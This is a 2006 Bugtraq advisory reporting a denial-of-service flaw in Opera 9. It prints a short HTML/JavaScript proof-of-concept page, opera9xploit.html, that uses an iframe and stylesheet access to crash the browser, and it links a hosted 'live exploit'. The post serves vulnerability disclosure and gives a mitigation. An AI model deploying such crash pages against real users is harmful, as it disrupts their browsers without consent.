[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060701091737.15250.qmail@securityfocus.com>
Date: 1 Jul 2006 09:17:37 -0000
From: y3dips@...o.or.id
To: bugtraq@...urityfocus.com
Subject: OPERA Web Browser 9 Denial OF Service
ECHO_ADV_35$2006
------------------------------------------------------------------------------------
[ECHO_ADV_35$2006] OPERA Web Browser 9 Denial OF Service
------------------------------------------------------------------------------------
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : July, 1th 2006
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv35-y3dips-2006.txt
Critical Lvl : Moderated
Impact : Browser will automatically shutdown
Where : From Remote
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Opera Web Browser
Application : Opera Web Browser
version : Opera/9.00 (X11; Linux i686; U; en)
Opera/9.00 (Windows NT 5:1;U;en)
Some Other version are bot vulnerable and others are not tested,
URL : http://opera.com
Description :
Vulnerability can be exploited by using <iframe> combining with javascript
(documents stylesheet) to create an out-of-bounds memory access.
------------------------------------------------------------------------------------
Exploit Code:
~~~~~~~~~~~~~~~~
-----------------------opera9xploit.html----------------------
<!-- Opera 9 DOS exploit, discovered by
Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)
http://y3d1ps.blogspot.com
//-->
<html>
<iframe src="palsu.php" name="fake" ></iframe>
<script type="text/javascript">
function mystyle() {
if (fake.document.styleSheets.length == 1 )
{
f = document.forms["basicstyle"].elements;
for (j = 0; j < f.length; j++)
{
if (f[j].name == 'fsmain');
}
}
}
mystyle();
</script>
</html>
live exploit :
http://y3dips.echo.or.id/opera9-dos/
------------------------------------------------------------------------------------
Solution:
~~~~~~~~
Disable Java Scipt execution from Opera Web browser
------------------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ my beloved ana
~ the_day, K-159 (keep researching), also all echo staff
~ negative , naisenodni crew
~ janex vind "waraxe" @ waraxe.us
~ newbie_hacker[at]yahoogroups.com
~ #e-c-h-o @irc.dal.net
------------------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] -------------------------------------------
Powered by blists - more mailing lists